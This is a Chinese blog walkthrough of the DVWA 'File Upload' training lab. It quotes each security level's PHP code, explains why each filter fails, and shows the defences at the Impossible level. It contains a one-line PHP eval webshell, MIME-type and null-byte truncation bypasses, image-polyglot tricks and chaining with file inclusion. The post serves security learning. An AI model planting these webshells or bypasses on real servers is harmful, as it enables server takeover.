File Upload

最新推荐文章于 2022-11-07 13:49:22 发布
最新推荐文章于 2022-11-07 13:49:22 发布
阅读量240 收藏
点赞数 1
分类专栏: DVWA
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/angry_program/article/details/104190265
版权

前言

文件上传漏洞(File Upload), 是由于程序未对上传的恶意文件进行检测和过滤所导致的漏洞,  攻击者可以向服务器上传动态可执行脚本, 包括: 木马,病毒,恶意脚本或者WebShell等。这种攻击是最有效和直接的,  文件上传功能本身没有问题,  重点是上传的是什么文件,  上传后服务器怎么处理这些文件。

具体参考:  文件上传漏洞

下面分析四种级别的文件上次漏洞:

 

 

  • Low

服务端核心代码:

<?php

if( isset( $_POST[ 'Upload' ] ) ) {
	// Where are we going to be writing to?
	$target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
	$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

	// Can we move the file to the upload folder?
	if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
		// No
		$html .= '<pre>Your image was not uploaded.</pre>';
	}
	else {
		// Yes!
		$html .= "<pre>{$target_path} succesfully uploaded!</pre>";
	}
}

?>
  • basename(path,suffix) 函数

函数返回路径中的文件名部分,如果可选参数suffix为空,则返回的文件名包含后缀名,反之不包含后缀名。

可以看到,服务器对上传文件的类型、内容没有做任何的检查、过滤,存在明显的文件上传漏洞,生成上传路径后,服务器会检查是否上传成功并返回相应提示信息。

 

漏洞利用

我们可以上传一个phpinfo()的脚本尝试一下:

<?php   phpinfo();  ?>

可以看到上传成功了,  我们访问一下:

进一步,  我们嚣张地写入php一句话后门:

<?php   @eval($_POST['hack']);  ?>

上传之后,  用菜刀连接:

 

 

  • Medium

服务端核心代码:

<?php

if( isset( $_POST[ 'Upload' ] ) ) {
	// Where are we going to be writing to?
	$target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
	$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

	// File information
	$uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
	$uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
	$uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];

	// Is it an image?
	if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
		( $uploaded_size < 100000 ) ) {

		// Can we move the file to the upload folder?
		if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
			// No
			$html .= '<pre>Your image was not uploaded.</pre>';
		}
		else {
			// Yes!
			$html .= "<pre>{$target_path} succesfully uploaded!</pre>";
		}
	}
	else {
		// Invalid file
		$html .= '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
	}
}

?>

服务端对上传的文件类型进行了过滤删选,  只能上传小于100kb的图片 ( jpeg或者png )

 

漏洞利用

尽管如此,  攻击者仍然可以通过抓包来攻击:

1.  修改文件类型

上传成功,  然后上菜刀就完事儿了。

2.  截断上传

  • 方法一:  %00 截断 

  • 方法二:  十六进制截断

将文件名改为 hack.php .png:

然后通过修改十六进制将空格改为截断符:

 

 

  • High

服务端核心代码:

<?php

if( isset( $_POST[ 'Upload' ] ) ) {
	// Where are we going to be writing to?
	$target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
	$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

	// File information
	$uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
	$uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
	$uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
	$uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ];

	// Is it an image?
	if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
		( $uploaded_size < 100000 ) &&
		getimagesize( $uploaded_tmp ) ) {

		// Can we move the file to the upload folder?
		if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
			// No
			$html .= '<pre>Your image was not uploaded.</pre>';
		}
		else {
			// Yes!
			$html .= "<pre>{$target_path} succesfully uploaded!</pre>";
		}
	}
	else {
		// Invalid file
		$html .= '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
	}
}

?>
  • strrpos(string,find,start) 函数

函数返回字符串find在另一字符串string中最后一次出现的位置,如果没有找到字符串则返回false,可选参数start规定在何处开始搜索。

  • getimagesize(string filename) 函数

函数将测定任何 GIF,JPG,PNG,SWF,SWC,PSD,TIFF,BMP,IFF,JP2,JPX,JB2,JPC,XBM 或 WBMP 图像文件的大小并返回图像的尺寸以及文件类型及图片高度与宽度。即函数会通过读取文件头,返回图片的长、宽等信息,如果没有相关的图片文件头,函数会报错。

可以看到,High级别的代码读取文件名中最后一个”.”后的字符串,  即取最后一个后缀,期望通过文件名来限制文件类型,因此要求上传文件名形式必须是”*.jpg”、”*.jpeg” 、”*.png”之一。同时,getimagesize函数更是限制了上传文件的文件头必须为图像类型。

假如我们尝试上传一个一句话后门的图片格式脚本 hack.png:

<?php   @eval($_POST['hack']);  ?>

发现即使图片类型为png的,  但是当内容非图片格式的时候,  也不能上传。

 

漏洞利用

正如上一级别一样,  利用%00截断可以很轻松的绕过文件名过滤规则;  但是文件内容必须包含图片格式就很麻烦了..

那么我们就利用jpg+php打一组混合拳,  用命令:

cat hack.php >> pic.jpg

将php一句话写到图片的最后 (注意大小不大于100KB):

然后上传就成功了:

或者也可以添加jpg图片的格式头到脚本 hack.jpg:

GIF89
<?php 
	@eval($_POST['hack']);
?>

同样可以上传成功:

上传之后的脚本是图片格式的,  肯定不能当做php解析,  固然也不能菜刀连之了..

中国菜刀的原理是向上传文件发送包含参数的post请求,通过控制参数来执行不同的命令,而这里服务器将木马文件解析成了图片文件,因此向其发送post请求时,服务器只会返回这个“图片”文件,并不会执行相应命令。

那么,怎么才能让我们的图片以 php 格式运行呢? 这里可以借助High级别的文件包含漏洞来获取webshell权限,让我们的图片格式的一句话木马以php格式运行。

访问url:

http://127.0.0.1/DVWA/vulnerabilities/fi/index.php?page=file:///var/www/DVWA/hackable/uploads/pic.jpg

可以看到, jpg的木马图片被当做php解析了,  所以直接上菜刀就可以连接了

 

 

  • Impossible

服务端核心代码:

<?php
 
if( isset( $_POST[ 'Upload' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
 
 
    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];    //文件在上传者机器上的文件名
    $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1); //上传文件的后缀名
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];  //上传文件的大小
    $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];  //上文文件的类型
    $uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ];  //文件上传到服务器临时文件夹后的文件名
 
    // Where are we going to be writing to?
    $target_path   = DVWA_WEB_PAGE_TO_ROOT . 'hackable/uploads/';
    //$target_file   = basename( $uploaded_name, '.' . $uploaded_ext ) . '-';
    $target_file   =  md5( uniqid() . $uploaded_name ) . '.' . $uploaded_ext;
    $temp_file     = ( ( ini_get( 'upload_tmp_dir' ) == '' ) ? ( sys_get_temp_dir() ) : ( ini_get( 'upload_tmp_dir' ) ) );
    $temp_file    .= DIRECTORY_SEPARATOR . md5( uniqid() . $uploaded_name ) . '.' . $uploaded_ext;
 
    // Is it an image?
    if( ( strtolower( $uploaded_ext ) == 'jpg' || strtolower( $uploaded_ext ) == 'jpeg' || strtolower( $uploaded_ext ) == 'png' ) &&
        ( $uploaded_size < 100000 ) &&
        ( $uploaded_type == 'image/jpeg' || $uploaded_type == 'image/png' ) &&
        getimagesize( $uploaded_tmp ) ) {
 
        // Strip any metadata, by re-encoding image (Note, using php-Imagick is recommended over php-GD)
        if( $uploaded_type == 'image/jpeg' ) {
            $img = imagecreatefromjpeg( $uploaded_tmp );
            imagejpeg( $img, $temp_file, 100);
        }
        else {
            $img = imagecreatefrompng( $uploaded_tmp );
            imagepng( $img, $temp_file, 9);
        }
        imagedestroy( $img );
 
        // Can we move the file to the web root from the temp folder?
        if( rename( $temp_file, ( getcwd() . DIRECTORY_SEPARATOR . $target_path . $target_file ) ) ) {
            // Yes!
            echo "<pre><a href='${target_path}${target_file}'>${target_file}</a> succesfully uploaded!</pre>";
        }
        else {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }
 
        // Delete any temp files
        if( file_exists( $temp_file ) )
            unlink( $temp_file );
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}
 
// Generate Anti-CSRF token
generateSessionToken();
 
?>
  • imagecreatefromjpeg(filename) 函数

从给定的文件或url中创建一个新的图片

  • imagejpeg(image,filename,quality)函数

从image图像中以 filename 文件名创建一个jpeg的图片,参数quality可选,0-100 (质量从小到大)

  • imagedestroy(image) 函数

销毁图像

可以看到,Impossible级别对上传的文件进行了重命名(为md5值,导致00截断无法绕过过滤规则),并且加入Anti-CSRF token防护CSRF攻击,同时对文件的内容作了严格的检查,导致攻击者无法上传含有恶意脚本的文件。
 

 

  • 参考文章

DVWA-1.9全级别教程之File Upload

angry_program
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
file upload useless
01-10
file upload useless
file-upload
02-01
文件上传,jQuery File Upload 是一个Jquery图片上传组件,支持多文件上传、取消、删除,上传前缩略图预览、列表显示图片大小,支持上传进度条显示;支持各种动态语言开发的服务器端。
PHP代码审计:文件上传(图片渲染绕过)
qq_22132931的博客
11-07 418
PHP代码审计:文件上传(图片渲染绕过)
DVWA中上传漏洞high级别的代码分析(超详细)
qq_36896220的博客
07-04 3018
首先贴出代码: <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; $target_path .= basename( $_FIL...
File Upload(文件上传)
qq_42176207的博客
05-06 3164
File Upload(文件上传) File Upload,即文件上传漏洞,指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限。 Low File Upload Source vulnerabilities/upload/source/low.php <?php if( isset( $_POST[ 'Upload' ] ) ) { // Wher
DVWA之File Upload (文件上传漏洞)
热门推荐
谢公子的博客
09-30 2万+
目录 Low: Medium: 方法一:抓包修改文件的type 方法二:00截断 High: Impossible : Low: 源代码: <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PA...
DVWA-文件上传与文件包含
qq_60848021的博客
06-23 2714
1,代码分析: 从以上代码可以看出并没有做任何限制,先用最简单的PHP一句话代码试下: 使用中国蚁剑进行连接 扩展:使用中国蚁剑连接出现以下情况是路径地址错误 出现”返回数据为空“,是代码有错误;basename()函数:返回带有文件扩展名的文件名部分。例如:/xx/test.php,返回test.php代码分析:继续上传yjh.php,使用BP进行抓包,更改文件类型扩展:[$_FILES’userfile’][‘name’]客户端机器文件的原名称。[$_FILES’userfile’][‘type
jQuery File Upload
05-16
•Multiple File Upload Widgets on the same page •Multiple File Input Fields in one Form. •How to implement Chunked file uploads. •Cross domain uploads (Cross-site uploads). •How to add Drop zone ...
dhtmlx file upload sample
11-15
dhtml file upload sample code server side and client side
spring boot file upload
08-03
spring boot file upload
DVWA [File Upload] [文件上传漏洞]
weixin_45253622的博客
05-20 675
目录 Low Medium High Impossible 漏洞防御 Low 源码: <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; //上传文件的路径 $target_path .= basename( $_FILES[
$_FILES详解
weixin_30701521的博客
03-16 347
<form enctype="multipart/form-data" action="upload.php" method="post"> <input type="hidden" name="MAX_FILE_SIZE" value="1000"> <input name="myFile" type="file"> <input type="...
DVWA靶场-文件上传漏洞
zeroone的博客
03-08 1万+
第五关:File upload(文件上传)       文件上传漏洞,通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁灭性的,Apache、Tomcat、Nginx等都曝出过文件上传漏洞。 Low <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to
File Upload(文件上传漏洞)
陌茗228.的博客
04-20 868
File Upload: 文件上传漏洞 通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限 Low: 源代码; <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; //文件上传到的目录
Linux 判断文件成功上传,Kali Linux系统利用DVWA靶场进测试文件上传漏洞:
weixin_31693025的博客
05-15 403
文件上传漏洞:漏洞原因是由于开发人员或者网站运维人员的一些失误导致用户上传的文件可以被服务器当作脚本执行文件解析执行,但是想要成功利用这个漏洞至少需要满足三个条件:1.有效上传点;2.上传文件能够被解析执行;3.上传文件能够被访问到.Low安全级别源代码:if( isset( $_POST[ 'Upload' ] ) ) {// Where are we going to be writing t...
PHP $_FILES函数详解
郝云博客
07-17 2万+
在PHP中上传一个文件建一个表单要比ASP中灵活得多。具体的看代码。 &lt;form enctype="multipart/form-data" action="upload.php" method="post"&gt; &lt;input type="hidden" name="MAX_FILE_SIZE" value="1000"&gt
2021-01-28
zhaodoudou1221的博客
01-31 150
DVWA-File Upload+Insecure CAPTCHA File Upload(文件上传) 简介: 文件上传漏洞通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁灭性的。(webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。webshell是web入侵的脚本攻击工具) File Upload-low 代码未做过滤 1.记事本
jquery file upload插件
最新发布
05-17
jQuery File Upload 是一个非常流行的 jQuery 插件,用于实现文件上传功能。它支持多文件上传、文件上传进度条显示、图片预览、拖拽上传等功能。此外,jQuery File Upload 支持多种文件上传方式,包括 HTML5、Flash ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值